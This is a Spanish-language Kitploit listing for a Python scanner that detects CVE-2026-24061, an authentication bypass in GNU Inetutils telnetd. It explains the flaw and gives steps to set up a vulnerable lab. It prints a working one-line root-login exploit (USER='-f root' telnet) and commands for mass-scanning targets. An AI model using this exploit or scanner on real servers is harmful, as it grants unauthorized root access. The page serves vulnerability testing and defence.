Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061 — Escáner basado en Python que detecta CVE-2026-24061 en GNU Inetutils telnetd, permitiendo pruebas por lotes de múltiples objetivos para la vulnerabilidad de omisión de autenticación. | Kitploit
Herramientas/GitHubGitHub/monstertsl/cve-2026-24061
Escáneres de VulnerabilidadesExplotaciónPruebas de PenetraciónAutenticaciónHerramienta de Acceso Remoto
GitHubmonstertsl/cve-2026-24061

CVE-2026-24061

Escáner basado en Python que detecta CVE-2026-24061 en GNU Inetutils telnetd, permitiendo pruebas por lotes de múltiples objetivos para la vulnerabilidad de omisión de autenticación.

Ver Repositorio
113hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de detección masiva de la vulnerabilidad CVE-2026-24061

⚠️ Nota: CVE-2026-24061 GNU Inetutils es un conjunto de herramientas de red clásicas proporcionado por el proyecto GNU, que incluye el servicio telnetd, es decir, el demonio del servidor Telnet. En las versiones 1.9.3 a 2.7, el servicio telnetd presenta un defecto crítico en el flujo de autenticación de usuarios. Cuando el servicio llama al programa de inicio de sesión del sistema /usr/bin/login, no logra filtrar ni validar eficazmente la variable de entorno USER enviada por el cliente. Un atacante puede inyectar directamente el parámetro -f en el comando login estableciendo un valor específico para la variable USER. El parámetro -f del programa login se utiliza para "omitir la autenticación secundaria", lo que permite al atacante eludir por completo todos los mecanismos de verificación de contraseña y establecer directamente una sesión remota como usuario root, obteniendo así el máximo control sobre el servidor. Esta vulnerabilidad es extremadamente peligrosa, equivalente a una puerta trasera remota de root pública que no requiere ninguna credencial.

POC de detección de la vulnerabilidad

USER='-f root' telnet -a <target_ip>

Script de detección

demo.png

Detección individual

python3 cve-2026-24061.py -i 10.10.168.128

Detección masiva

python3 cve-2026-24061.py -f targets.txt

Principio de la vulnerabilidad

El comando anterior establece la variable de entorno USER en -f root. Cuando el servicio telnetd vulnerable recibe la conexión, construye y ejecuta una llamada al sistema similar a la siguiente:

Pasos para reproducir

1. Instalar los programas necesarios

sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y

2. Descomentar la línea de telnet (asegurarse de que el formato sea correcto)

sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf

3. Reiniciar el servicio

sudo systemctl restart openbsd-inetd

4. Verificar el puerto

sudo ss -tuln | grep ':23'

5. Prueba local

telnet localhost 23
Descargar herramienta